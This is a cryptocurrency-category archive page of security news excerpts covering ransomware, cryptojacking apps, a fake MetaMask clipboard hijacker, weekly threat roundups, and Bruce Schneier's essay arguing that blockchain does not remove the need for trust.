Category Archives: cryptocurrency

Ransomware Revenue Earning Does Not Match Infection Decline

There has been a decline in ransomware infections, but that does not mean that earned revenue has reduced for cyber-criminals. According to the third instalment of the Check Point 2019 Security

The post Ransomware Revenue Earning Does Not Match Infection Decline appeared first on The Cyber Security Place.

Threat Actors Impersonate Oil and Gas Companies in Latest Shade Ransomware Attack

Digital criminals tried to impersonate oil and gas companies in a recent attack campaign distributing Shade ransomware.

Between January and February, Yoroi observed an attack campaign leveraging email as an infection vector. Each of the emails came with an attached ZIP file called slavneft.zakaz.zip. The name of this file means “Slavneft order” in English, which includes a direct reference to the Russian oil and gas company PAO NGK Slavneft. Building on this disguise, the ZIP file contained a JavaScript file named «ПАО «НГК «Славнефть» подробности заказа, which translates to “PAO NGK Slavneft order details” in English.

Clicking on the JavaScript file activated a downloader that pulls Shade from one of several compromised websites. At that point, the ransomware payload, which had a VirusTotal detection rate of just 24 out of 69 tools at the time of discovery, encrypted all of the infected machine’s files using Advanced Encryption Standard (AES). It then created a ransom note, which included instructions for victims to visit a dark web site so they could receive payment instructions from the attackers.

A Busy 2019 for Shade

Yoroi isn’t the only digital defense company that recently detected a new Shade ransomware campaign. In January 2019, ESET witnessed a large uptick in emails containing malicious JavaScript attachments, including those responsible for downloading Shade. In February, Carbon Black observed a similar campaign also leveraging JavaScript attachments to target primarily Russian speakers.

These attacks come at a time when targeted ransomware remains one of the most prominent threats targeting organizations. Europol said as much in 2018 after it observed threat actors turning to targeted ransomware, not banking Trojans, as their preferred payload in financially motivated cyberattacks. This preference contributed to Cybersecurity Ventures‘ estimate that ransomware damages would surpass $8 billion by the end of 2018.

How to Protect Against Shade Ransomware

Security professionals can help defend their organizations against Shade ransomware and similar malware by making sure their endpoint software is up-to-date and all applications are updated to their most secure versions. Organizations should also make sure to isolate their data backup systems so that attackers can’t encrypt these copies in the event of a successful ransomware infection.

The post Threat Actors Impersonate Oil and Gas Companies in Latest Shade Ransomware Attack appeared first on Security Intelligence.

Microsoft removes eight apps from its Windows App Store that were mining cryptocurrencies

Eight Malicious Crypto-Mining Apps Removed From Microsoft’s Windows App Store

Microsoft has removed eight applications from its Windows App Store that were mining Monero crypto-currency without the knowledge of users.

The illicit eight crypto-jacking Windows 10 applications were discovered by the cybersecurity company, Symantec in the month of January this year. Apparently, these apps were published in the Microsoft Store between April and December 2018, but many of them were published only towards the end of the year.

“On January 17, we discovered several potentially unwanted applications (PUAs) on the Microsoft Store that surreptitiously use the victim’s CPU power to mine cryptocurrency. We reported these apps to Microsoft and they subsequently removed them from their store,” Symantec said in a blog post.  

For those unfamiliar, crypto-jacking, also often referred to as drive-by mining, is the process whereby hackers and websites host sections of code that have the ability to secretly siphon off your computer processing unit’s (CPU) power towards mining cryptocurrency for the offenders to make money from.

According to Symantec, all eight apps are likely developed by the same person or group. “The apps – which included those for computer and battery optimization tutorials, internet search, web browsers, and video viewing and download – came from three developers: DigiDream, 1clean, and Findoo. In total, we discovered eight apps from these developers that shared the same risky behavior. After further investigation, we believe that all these apps were likely developed by the same person or group,” Symantec added.

All the malicious apps that ran on Windows 10, including Windows 10 S Mode were Progressive Web Apps (PWAs). These are web applications that load like regular web pages or websites but can offer user functionality such as working offline, push notifications, and device hardware access traditionally available only to native applications. PWAs combine the flexibility of the web with the experience of a native application.

Ironically, Microsoft’s Windows 10 S Mode is the most secure Windows 10 version, as it restricts app downloads to the Microsoft Store.

“As soon as the apps are downloaded and launched, they fetch a coin-mining JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. The mining script then gets activated and begins using the majority of the computer’s CPU cycles to mine Monero for the operators. Although these apps appear to provide privacy policies, there is no mention of coin mining on their descriptions on the app store.” Symantec said.

The eight crypto jacking apps were published in the Store by three developers, “DigiDream”, “1clean”, and “Findoo”. These apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browser+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, Findoo Mobile & Desktop Search.

All the eight apps collectively boasted over 1,900 reviews. However, since the app ratings can be fraudulently inflated, it is currently unclear how many of these app ratings and downloads are legal.

If you have installed any of the above-mentioned apps, it is suggested that you uninstall them as soon as possible. It is recommended that you keep your software up to date and avoid downloading apps from unfamiliar sites. Only install apps from trusted sources. Also, closely monitor CPU and memory usage of your computer or device.

Source: Symantec

The post Microsoft removes eight apps from its Windows App Store that were mining cryptocurrencies appeared first on TechWorm.

Opera integrates a cryptocurrency wallet – is this Web 3.0?

When it appears in the next few weeks, the next version of Opera (“Reborn 3” or “R3”) for Windows, Mac and Linux will become the first mainstream desktop browser to integrate a cryptocurrency wallet.

Cyber Security Week in Review (Feb. 15, 2019)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
  • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice of only routing the country’s web requests through the country and not internationally. The country will run a test later this year in an effort to test its cyber defenses.
  • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

From Talos


  • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
  • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
  • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

Malware roundup


  • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once infected, the malware can steal users’ personal information and uses several deobfuscation techniques to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
  • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask them to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to only be available to the National Credit Union Administration.
  • Google removed a cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials to steal users’ Ethereum funds. 

The rest of the news


  • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background of cameras to record the hashes of the video, which would appear different a second time if the user had edited the video. All of these results are recorded on the public blockchain.
  • India requested Facebook give its government a backdoor into the WhatsApp messaging app. This would require Facebook to give the government access to users’ encrypted messages that were originally secret.
  • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  


Blockchain and Trust

In his 2008 white paper that first proposed bitcoin, the anonymous Satoshi Nakamoto concluded with: "We have proposed a system for electronic transactions without relying on trust." He was referring to blockchain, the system behind bitcoin cryptocurrency. The circumvention of trust is a great promise, but it's just not true. Yes, bitcoin eliminates certain trusted intermediaries that are inherent in other payment systems like credit cards. But you still have to trust bitcoin -- and everything about it.

Much has been written about blockchains and how they displace, reshape, or eliminate trust. But when you analyze both blockchain and trust, you quickly realize that there is much more hype than value. Blockchain solutions are often much worse than what they replace.

First, a caveat. By blockchain, I mean something very specific: the data structures and protocols that make up a public blockchain. These have three essential elements. The first is a distributed (as in multiple copies) but centralized (as in there's only one) ledger, which is a way of recording what happened and in what order. This ledger is public, meaning that anyone can read it, and immutable, meaning that no one can change what happened in the past.

The second element is the consensus algorithm, which is a way to ensure all the copies of the ledger are the same. This is generally called mining; a critical part of the system is that anyone can participate. It is also distributed, meaning that you don't have to trust any particular node in the consensus network. It can also be extremely expensive, both in data storage and in the energy required to maintain it. Bitcoin has the most expensive consensus algorithm the world has ever seen, by far.

Finally, the third element is the currency. This is some sort of digital token that has value and is publicly traded. Currency is a necessary element of a blockchain to align the incentives of everyone involved. Transactions involving these tokens are stored on the ledger.

Private blockchains are completely uninteresting. (By this, I mean systems that use the blockchain data structure but don't have the above three elements.) In general, they have some external limitation on who can interact with the blockchain and its features. These are not anything new; they're distributed append-only data structures with a list of individuals authorized to add to it. Consensus protocols have been studied in distributed systems for more than 60 years. Append-only data structures have been similarly well covered. They're blockchains in name only, and -- as far as I can tell -- the only reason to operate one is to ride on the blockchain hype.

All three elements of a public blockchain fit together as a single network that offers new security properties. The question is: Is it actually good for anything? It's all a matter of trust.

Trust is essential to society. As a species, humans are wired to trust one another. Society can't function without trust, and the fact that we mostly don't even think about it is a measure of how well trust works.

The word "trust" is loaded with many meanings. There's personal and intimate trust. When we say we trust a friend, we mean that we trust their intentions and know that those intentions will inform their actions. There's also the less intimate, less personal trust -- we might not know someone personally, or know their motivations, but we can trust their future actions. Blockchain enables this sort of trust: We don't know any bitcoin miners, for example, but we trust that they will follow the mining protocol and make the whole system work.

Most blockchain enthusiasts have a unnaturally narrow definition of trust. They're fond of catchphrases like "in code we trust," "in math we trust," and "in crypto we trust." This is trust as verification. But verification isn't the same as trust.

In 2012, I wrote a book about trust and security, Liars and Outliers. In it, I listed four very general systems our species uses to incentivize trustworthy behavior. The first two are morals and reputation. The problem is that they scale only to a certain population size. Primitive systems were good enough for small communities, but larger communities required delegation, and more formalism.

The third is institutions. Institutions have rules and laws that induce people to behave according to the group norm, imposing sanctions on those who do not. In a sense, laws formalize reputation. Finally, the fourth is security systems. These are the wide varieties of security technologies we employ: door locks and tall fences, alarm systems and guards, forensics and audit systems, and so on.

These four elements work together to enable trust. Take banking, for example. Financial institutions, merchants, and individuals are all concerned with their reputations, which prevents theft and fraud. The laws and regulations surrounding every aspect of banking keep everyone in line, including backstops that limit risks in the case of fraud. And there are lots of security systems in place, from anti-counterfeiting technologies to internet-security technologies.

In his 2018 book, Blockchain and the New Architecture of Trust, Kevin Werbach outlines four different "trust architectures." The first is peer-to-peer trust. This basically corresponds to my morals and reputational systems: pairs of people who come to trust each other. His second is leviathan trust, which corresponds to institutional trust. You can see this working in our system of contracts, which allows parties that don't trust each other to enter into an agreement because they both trust that a government system will help resolve disputes. His third is intermediary trust. A good example is the credit card system, which allows untrusting buyers and sellers to engage in commerce. His fourth trust architecture is distributed trust. This is emergent trust in the particular security system that is blockchain.

What blockchain does is shift some of the trust in people and institutions to trust in technology. You need to trust the cryptography, the protocols, the software, the computers and the network. And you need to trust them absolutely, because they're often single points of failure.

When that trust turns out to be misplaced, there is no recourse. If your bitcoin exchange gets hacked, you lose all of your money. If your bitcoin wallet gets hacked, you lose all of your money. If you forget your login credentials, you lose all of your money. If there's a bug in the code of your smart contract, you lose all of your money. If someone successfully hacks the blockchain security, you lose all of your money. In many ways, trusting technology is harder than trusting people. Would you rather trust a human legal system or the details of some computer code you don't have the expertise to audit?

Blockchain enthusiasts point to more traditional forms of trust -- bank processing fees, for example -- as expensive. But blockchain trust is also costly; the cost is just hidden. For bitcoin, that's the cost of the additional bitcoin mined, the transaction fees, and the enormous environmental waste.

Blockchain doesn't eliminate the need to trust human institutions. There will always be a big gap that can't be addressed by technology alone. People still need to be in charge, and there is always a need for governance outside the system. This is obvious in the ongoing debate about changing the bitcoin block size, or in fixing the DAO attack against Ethereum. There's always a need to override the rules, and there's always a need for the ability to make permanent rules changes. As long as hard forks are a possibility -- that's when the people in charge of a blockchain step outside the system to change it -- people will need to be in charge.

Any blockchain system will have to coexist with other, more conventional systems. Modern banking, for example, is designed to be reversible. Bitcoin is not. That makes it hard to make the two compatible, and the result is often an insecurity. Steve Wozniak was scammed out of $70K in bitcoin because he forgot this.

Blockchain technology is often centralized. Bitcoin might theoretically be based on distributed trust, but in practice, that's just not true. Just about everyone using bitcoin has to trust one of the few available wallets and use one of the few available exchanges. People have to trust the software and the operating systems and the computers everything is running on. And we've seen attacks against wallets and exchanges. We've seen Trojans and phishing and password guessing. Criminals have even used flaws in the system that people use to repair their cell phones to steal bitcoin.

Moreover, in any distributed trust system, there are backdoor methods for centralization to creep back in. With bitcoin, there are only a few miners of consequence. There's one company that provides most of the mining hardware. There are only a few dominant exchanges. To the extent that most people interact with bitcoin, it is through these centralized systems. This also allows for attacks against blockchain-based systems.

These issues are not bugs in current blockchain applications, they're inherent in how blockchain works. Any evaluation of the security of the system has to take the whole socio-technical system into account. Too many blockchain enthusiasts focus on the technology and ignore the rest.

To the extent that people don't use bitcoin, it's because they don't trust bitcoin. That has nothing to do with the cryptography or the protocols. In fact, a system where you can lose your life savings if you forget your key or download a piece of malware is not particularly trustworthy. No amount of explaining how SHA-256 works to prevent double-spending will fix that.

Similarly, to the extent that people do use blockchains, it is because they trust them. People either own bitcoin or not based on reputation; that's true even for speculators who own bitcoin simply because they think it will make them rich quickly. People choose a wallet for their cryptocurrency, and an exchange for their transactions, based on reputation. We even evaluate and trust the cryptography that underpins blockchains based on the algorithms' reputation.

To see how this can fail, look at the various supply-chain security systems that are using blockchain. A blockchain isn't a necessary feature of any of them. The reasons they're successful is that everyone has a single software platform to enter their data in. Even though the blockchain systems are built on distributed trust, people don't necessarily accept that. For example, some companies don't trust the IBM/Maersk system because it's not their blockchain.

Irrational? Maybe, but that's how trust works. It can't be replaced by algorithms and protocols. It's much more social than that.

Still, the idea that blockchains can somehow eliminate the need for trust persists. Recently, I received an email from a company that implemented secure messaging using blockchain. It said, in part: "Using the blockchain, as we have done, has eliminated the need for Trust." This sentiment suggests the writer misunderstands both what blockchain does and how trust works.

Do you need a public blockchain? The answer is almost certainly no. A blockchain probably doesn't solve the security problems you think it solves. The security problems it solves are probably not the ones you have. (Manipulating audit data is probably not your major security risk.) A false trust in blockchain can itself be a security risk. The inefficiencies, especially in scaling, are probably not worth it. I have looked at many blockchain applications, and all of them could achieve the same security properties without using a blockchain­ -- of course, then they wouldn't have the cool name.

Honestly, cryptocurrencies are useless. They're only used by speculators looking for quick riches, people who don't like government-backed currencies, and criminals who want a black-market way to exchange money.

To answer the question of whether the blockchain is needed, ask yourself: Does the blockchain change the system of trust in any meaningful way, or just shift it around? Does it just try to replace trust with verification? Does it strengthen existing trust relationships, or try to go against them? How can trust be abused in the new system, and is this better or worse than the potential abuses in the old system? And lastly: What would your system look like if you didn't use blockchain at all?

If you ask yourself those questions, it's likely you'll choose solutions that don't use public blockchain. And that'll be a good thing -- especially when the hype dissipates.

This essay previously appeared on Wired.com.

EDITED TO ADD (2/11): Two commentaries on my essay.

I have wanted to write this essay for over a year. The impetus to finally do it came from an invite to speak at the Hyperledger Global Forum in December. This essay is a version of the talk I wrote for that event, made more accessible to a general audience.

It seems to be the season for blockchain takedowns. James Waldo has an excellent essay in Queue. And Nicholas Weaver gave a talk at the Enigma Conference, summarized here. It's a shortened version of this talk.

EDITED TO ADD (2/17): Reddit thread.

E Hacking News – Latest Hacker News and IT Security News: The Ukrainian man stole half a million from crypto-wallets



The man, who stole 500 000 UAH (18 350 USD) from the crypto-wallets of clients of the online cryptocurrency exchange, was detained in the Kiev region.

The Ukrainian cyber police stated that the 35-year-old man provided technical support to the British stock exchange with online cryptocurrency exchange and had access to personal data of customers. He used them to steal from Bitcoin and various Altcoin accounts. Thus, he stole 500 000 UAH for several months.

Theft of cryptocurrency occurred in several stages. At first, the attacker was looking for accounts of clients who for a long time did not open their accounts and did not have a complex authentication system.

After that, the Ukrainian made a substitution of backup e-mail boxes or added them to accounts where they were not specified. Thus, he restored the passwords to the wallets and initiated the debiting of electronic money.

Conversion and withdrawal of money took place through an online exchange.

At the moment the amount of damage is 720 000 UAH (26 400 USD). The received funds the attacker spent on gambling on virtual simulators of slot machines.



E Hacking News - Latest Hacker News and IT Security News

The Ukrainian man stole half a million from crypto-wallets



The man, who stole 500 000 UAH (18 350 USD) from the crypto-wallets of clients of the online cryptocurrency exchange, was detained in the Kiev region.

The Ukrainian cyber police stated that the 35-year-old man provided technical support to the British stock exchange with online cryptocurrency exchange and had access to personal data of customers. He used them to steal from Bitcoin and various Altcoin accounts. Thus, he stole 500 000 UAH for several months.

Theft of cryptocurrency occurred in several stages. At first, the attacker was looking for accounts of clients who for a long time did not open their accounts and did not have a complex authentication system.

After that, the Ukrainian made a substitution of backup e-mail boxes or added them to accounts where they were not specified. Thus, he restored the passwords to the wallets and initiated the debiting of electronic money.

Conversion and withdrawal of money took place through an online exchange.

At the moment the amount of damage is 720 000 UAH (26 400 USD). The received funds the attacker spent on gambling on virtual simulators of slot machines.

MetaMask app on Google Play was a Clipboard Hijacker

Security researcher Lukas Stefanko from ESET discovered the first Android cryptocurrency clipboard hijacker impersonating MetaMask on the official Google Play store.

The rogue MetaMask app is a Clipboard Hikacker that monitors a device’s clipboard for Bitcoin and Ethereum addresses and replaces them with addresses of wallets under the control of the attacker. Using this trick the attackers can transfers funds to their wallets.

“This dangerous form of malware first made its rounds in 2017 on the Windows platform and was spotted in shady Android app stores in the summer of 2018. In February 2019, we discovered a malicious clipper on Google Play, the official Android app store.” reads the post published by ESET.

MetaMask clipboard hijacker

The Clipboard Hikacker poses itself as a mobile version of the legitimate service
MetaMask.io which is designed to run Ethereum decentralized apps in a browser, without having to run a full Ethereum node.

However, the legitimate service currently does not offer a mobile app.

Lukas Stefanko discovered that the app was able to steal cryptocurrency using two different attack methods.

The first attack scenario sees attackers using the app to attempt to steal the private keys and seeds of an Ethereum wallet when a user adds it to the app. Once the attackers obtain this data send it to a Telegram account.

The second attack scenario sees attackers monitoring the clipboard for Ethereum and Bitcoin addresses, and when one is detected, replace it with the attackers’ address.

In June 2017, security researchers from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers. Most of the victims are located in Asia, mainly China.

In July 2017, a CryptoCurrency Clipboard Hijackers was discovered by BleepingComputer while monitoring more than 2.3 million addresses.

In March 2018, security researchers at Palo Alto Networks, spotted a strain of malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address to the Windows clipboard. The malicious code then replaces the address in the clipboard with the author’s one.

Pierluigi Paganini

(SecurityAffairs – Clipboard Hikacker, MetaMask)

The post MetaMask app on Google Play was a Clipboard Hijacker appeared first on Security Affairs.

New Linux Crypto-Mining Malware Kills Other Malicious Miners Upon Installation

Security analysts identified a sample of Linux crypto-mining malware that kills any other malicious miners upon installation.

Trend Micro researchers discovered the malware while doing a routine log check after spotting a script within one of their honeypots that began downloading a binary connected to a domain. This binary turned out to be a modified version of the cryptocurrency miner XMR-Stak.

The script didn’t stop at downloading this sample of Linux malware, which Trend Micro detected as Coinminer.Linux.MALXMR.UWEIU. It removed other crypto-mining malware and related services affecting the machine at the time of infection. The malware also created new directories and files and stopped processes that shared connections with known IP addresses.

A Likeness to Other Threats

In their analysis of Coinminer.Linux.MALXMR.UWEIU, Trend Micro found that the malware’s script shares certain attributes with other threats it previously detected. Specifically, researchers observed similarities between this malicious coin miner and Xbash, a malware family discovered by Trend Micro in September 2018 that combines ransomware, cryptocurrency mining, worm and scanner capabilities in its attacks against Linux and Windows servers.

Researchers also noted that the threat’s code is nearly identical to that of KORKERDS, crypto-mining malware Trend Micro uncovered back in November 2018. There are a few differences, however.

The new script simplified the routine by which KORKERDS downloads and executes files and loads the Linux coin malware sample. It also didn’t uninstall security solutions from or install a rootkit on the infected machine. In fact, the script’s kill list targeted both KORKERDS and its rootkit component. This move suggests that those who coded the script are attempting to maximize their profits while competing with the authors of KORKERDS.

Strengthen Your Crypto-Mining Malware Defenses

Security professionals can help defend against Linux crypto-mining malware by using an endpoint management and security platform capable of monitoring endpoints for suspicious behavior. Organizations should also leverage security information and event management (SIEM) tools that can notify security teams of high central processing unit (CPU) and graphics processing unit (GPU) usage — key indicators of cryptocurrency mining activities — during nonbusiness hours.

The post New Linux Crypto-Mining Malware Kills Other Malicious Miners Upon Installation appeared first on Security Intelligence.

Clipper Malware Found Masquerading as Legitimate Service on Google Play Store

Security researchers discovered a sample of clipper malware that targeted Android users by lurking in the Google Play store.

ESET first came across Android/Clipper.C masquerading as MetaMask, a service that allows users to access Ethereum-enabled distributed applications, in February 2019. This new threat is capable of stealing users’ credentials and private keys to gain access to their Ethereum funds. But Android/Clipper.C is a bit more sophisticated: It’s also a form of clipper malware in that it can replace a bitcoin or Ethereum wallet address copied from the clipboard with one under the attacker’s control.

ESET researchers discovered the malicious app on the Google Play store shortly after it became available for download on Feb. 1. They reported their findings to Google’s security team, which subsequently removed the app from the app marketplace.

Android/Clipper.C is not the only malware sample that’s impersonated MetaMask. Other programs used the MetaMask disguise to phish for sensitive data and steal access to users’ cryptocurrency funds.

The Growing Problem of Clipper Malware

Android/Clipper.C is just the latest instance of clipper malware to prey on users. In March 2018, ESET learned about one sample of this threat category targeting Monero users by masquerading as a Win32 Disk Imager application on download.com.

A few months later, Bleeping Computer discovered another cryptocurrency clipboard hijacker that was monitoring 2.3 million cryptocurrency addresses at the time of discovery. Dr.Web also uncovered an Android clipper in summer 2018, though this threat was not available for download on the Google Play store at that time.

How to Defend Against Disguised Malware Threats

Security professionals can help defend against threats like Android/Clipper.C by investing in a unified endpoint management (UEM) solution that can alert users when malware is detected and automatically uninstall infected apps. They should also leverage artificial intelligence (AI) to spot malicious behaviors and stop malware like Android/Clipper.C in its tracks.

The post Clipper Malware Found Masquerading as Legitimate Service on Google Play Store appeared first on Security Intelligence.

A week in security (February 4 – 8)

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.

First Android Clipboard Hijacking Crypto Malware Found On Google Play Store

A security researcher has discovered yet another cryptocurrency-stealing malware on the official Google Play Store that was designed to secretly steal bitcoin and cryptocurrency from unwitting users. The malware, described as a "Clipper," masqueraded as a legitimate cryptocurrency app and worked by replacing cryptocurrency wallet addresses copied into the Android clipboard with one belonging

Clipper malware on Play Store replaces users BTC & ETH wallet address

By Waqas

This is the first ever Clipper malware found on Play Store. Another day another Android malware on Google Play Store – This time the IT security researchers at ESET have discovered a malware known for replacing the content of clipboard on the targeted device. This type of malware is called Clipper malware. The malware was targeting Android […]

This is a post from HackRead.com Read the original post: Clipper malware on Play Store replaces users BTC & ETH wallet address

Solve.Care Has Potential to Transform the Field of Healthcare Administration

The last few years have been a crazy ride in the crypto markets.  We’ve seen both the buying frenzy and the panic selling.  Although the industry has a lot of potential, it is undoubtedly true that many projects will fizzle out during the next 12-24 months.  Traders need to carefully analyze projects that have the […]

The post Solve.Care Has Potential to Transform the Field of Healthcare Administration appeared first on Hacked: Hacking Finance.

Cyber Security Week in Review (Feb. 8)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Attackers continue to utilize a security hole in GoDaddy.com domains. The flaw allows unauthenticated users to send malicious emails via legitimate, dormant domains. Most recently, a group of attackers sent out a series of sextortion and bomb threat emails, as outlined in a report by Cisco Talos. GoDaddy is the world’s largest domain name registrar.
  • Email spammers are taking advantage of a little-known Gmail feature that allows them to grow their reach. They can create so-called “dot emails,” which places a period between each letter in their domain name. If the attackers are able to use a seemingly legitimate domain, they can then add dots to that domain and still control the emails, allowing them to send out more spam. 
  • Facebook is stepping up its crackdown on fake accounts. The social media site took down thousands of pages and profiles posting malicious content. The pages originated from Iran and Indonesia. Earlier this month, it also removed Russian- and Philipino-backed, politically motivated pages.

From Talos


  • An evolution of the LuckyCat malware, known as “ExileRAT,” is targeting Tibetan users. Talos recently discovered an email campaign that sent malicious documents to members of a mailing list related to the Tibetan government-in-exile. Based on the malware’s capabilities, it’s believed the attackers aim to spy on their victims.
  • Cryptocurrency miners, trojans lead malware in 2018. Talos this week published a roundup of the SNORT® rules that triggered the most last year. Rules that helped protect users against miners and trojans were among the most used.

Malware roundup


  • A new backdoor is targeting Linux systems. Known as “SpeakUp,” the remote access trojan allows attackers to gain boot persistence by modifying the local cron utility, run shell commands and execute downloaded files.
  • Banking customers in the U.K. fell victim to SS7 attacks that drained their accounts. Attackers were able to exploit SS7 to intercept users’ phone calls and text messages, eventually being able to steal banking credentials. The U.K.’s Metro Bank was specifically targeted in the most recent campaign. 
  • New variants of DanaBot are targeting users in Europe. Machines already infected with DanaBot received disguised “updates” with the new variants, and attackers also sent out malspam to Polish users. These versions use a different command and control communication method than the original version from 2018. 

The rest of the news


  • Mozilla is working on a new feature for Firefox to protect against side-channel attacks. The new tool aims to be an improved version of Google Chrome’s Site Isolation feature, which helps browsers block potential side-channel attacks.
  • The U.S. Department of Justice and Department of Homeland Security completed an election security report. The study, ordered by the White House, looks at whether the 2018 midterm elections were influenced by foreign interference. It’s unclear whether the report will ever be made public. 
  • Google patched a critical vulnerability in Android devices as part of its February security update. Attackers could use a specially crafted PNG image to completely take over the victim’s mobile device. Google says there’s no evidence of the bug being exploited in the wild.


This Week in Security News: Consumer Data and Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn what security issues and critical threats will impact consumer data this year. Also, learn about a malicious Adobe app targeting macOS systems.

Read on: 

Keys to Safeguarding Consumer Data in 2019

Trend Micro reports that there are certain security issues which will specifically impact consumer data, including phishing and fraud attacks. 

Linksys Partners with Trend Micro for Network Protection on Velop Wi-Fi Systems

Linksys and Trend Micro have partnered to deliver a security solution for home networks to give families an added layer of digital projection.

Collaborating with Law Enforcement to Tackle the Scourge of ATM Attacks

Trend Micro contributed to a new Europol report detailing guidelines on logical ATM attacks, in support of ongoing efforts by both law enforcement and the financial industry to stop ATM abuse. 

Report: Over 59,000 GDPR Data Breach Notifications, But Only 91 Fines

Since the European Union’s General Data Protection Regulation (GDPR) came into effect in May last year, EU organizations have reported almost 60,000 data breaches, but so far fewer than 100 fines have been issued by regulators.

MacOS Malware Poses as Adobe Zii, Steals Credit Card Info and Mines Monero Cryptocurrency

Trend Micro found a malicious app posing as Adobe Zii (a tool used to crack Adobe products) targeting macOS systems to mine cryptocurrency and steal credit card information. 

Auto Engineers Warn Your Car Might be Easier to Hack Than You Think

As auto makers roll out more sophisticated features, the upgrades are also making cars more vulnerable to cyberattacks, according to a new report from the Ponemon Institute.

Managing Digital Footprints and Data Privacy

A massive data dump involving more than two billion user credentials was reported earlier this year. The ramifications of this dump is just the beginning for many of those whose data are included. 

Just Two Hacker Groups are Behind 60% of Stolen Cryptocurrency

A new report from blockchain investigation company Chainalysis reveals that just two criminal groups are responsible for around 60% of all cryptocurrency stolen from exchanges.

EU Orders Recall of Children’s Smartwatch Over Severe Privacy Concerns

For the first time, EU authorities have announced plans to recall a product from the European market because of a data privacy issue. The product is Safe-KID-One, a children’s smartwatch produced by German electronics vendor ENOX.

Do you agree phishing and fraud attacks will be the main threats impacting consumer data in 2019? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Consumer Data and Malware appeared first on .

Child abuse imagery found in cryptocurrency blockchain

For the second time in a year, illegal child abuse images have been spotted inside a blockchain. According to a post by web blockchain payments system Money Button, on 30 January its service was abused to place “illegal content” inside the Bitcoin Satoshi Vision (BSV) ledger, a recent cryptocurrency hard fork from Bitcoin Cash [BCH]. […]

Bitcoin’s Range-Bound Consolidation Continues; Bearish Breakdown Eyed

Bitcoin (BTC) was little changed on Friday, as prices continued to languish near two-month lows following a sizable correction at the beginning of the week. Since the hard fall on Monday, the leading digital currency has shown little signs of recovery as the bears continue to eye the December 2018 low. BTC/USD Update The bitcoin […]

The post Bitcoin’s Range-Bound Consolidation Continues; Bearish Breakdown Eyed appeared first on Hacked: Hacking Finance.

Smashing Security #114: Darknet Diaries, death, and beauty apps

Smashing Security #114: Darknet Diaries, death, and beauty apps

Jack Rhysider from the “Darknet Diaries” podcast joins us to chat about his interview with the elusive Hacker Giraffe, how a death is preventing cryptocurrency investors from reaching their money, and how ‘beauty camera’ apps are redirecting users to phishing websites and stealing their selfies.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast hosted by computer security veterans Graham Cluley and Carole Theriault.

E Hacking News – Latest Hacker News and IT Security News: The Indian Government Reportedly Worried Of Cryptocurrencies Destabilizing the Rupee



The Indian government panel entrusted with drafting the crypto regulation is supposedly "fixated" with the effect they might have on the rupee in the event if they are permitted to be utilized in payments. The panel was set up in November 2017 headed by the top bureaucrat Subhash Chandra Garg, Secretary of the Department of Economic Affairs. The board is as of now said to be in the propelled phases of drafting the regulations for cyrptocurrency utilization in India.

One of the representatives from the crypto currency background who as of late met the ministers, asking for obscurity says that

“If bitcoin and other digital currencies are going to be allowed to be used for payments then whether it will end up destabilising the fiat currency is a major concern for them (the Garg panel), the overall impact on the financial ecosystem that it is likely to have is still unclear and it has been a challenge to convince them on this particular point.”

While Garg's panel  is settling its report containing the proposals for the country's crypto regulation , the Ministry of Finance told the Parliament that  “It is difficult to state a specific timeline to come up with clear recommendations”  furthermore that Garg’s panel is “pursuing the matter with due caution.”

The Financial Stability Board (FSB) has effectively distributed a report in October a year ago on the financial stability implications of crypto assets, which expresses that “crypto assets do not pose a material risk to global financial stability at this time.”

